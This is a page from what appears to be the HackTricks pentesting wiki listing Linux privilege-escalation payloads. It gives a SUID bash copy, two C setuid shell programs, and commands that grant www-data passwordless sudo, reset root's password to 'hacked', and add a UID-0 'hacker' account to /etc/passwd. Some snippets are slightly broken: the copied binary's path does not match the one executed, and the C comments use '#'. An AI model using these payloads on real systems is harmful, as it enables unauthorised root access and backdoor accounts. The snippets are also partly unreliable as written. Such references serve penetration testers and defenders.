hacktricks/linux-unix/privilege-escalation/payloads-to-execute.md

Payloads to execute

Bash

cp /bin/bash /tmp/b && chmod +s /tmp/b
/bin/b -p #Maintains root privileges from suid, working in debian & buntu

C

#gcc payload.c -o payload
int main(void){
    setresuid(0, 0, 0); #Set as user suid user
    system("/bin/sh");
    return 0;
}

#gcc payload.c -o payload
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

int main(){
    setuid(getuid());
    system("/bin/bash");
    return 0;
}

Scripts

Can you make root execute something?

www-data to sudoers

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Change root password

echo "root:hacked" | chpasswd

Add new root user to /etc/passwd

echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysalt myhackerpass || echo '$1$mysalt$7DTZJIc9s6z60L6aj0Sui.') 2>/dev/null):0:0::/:/bin/bash >> /etc/passwd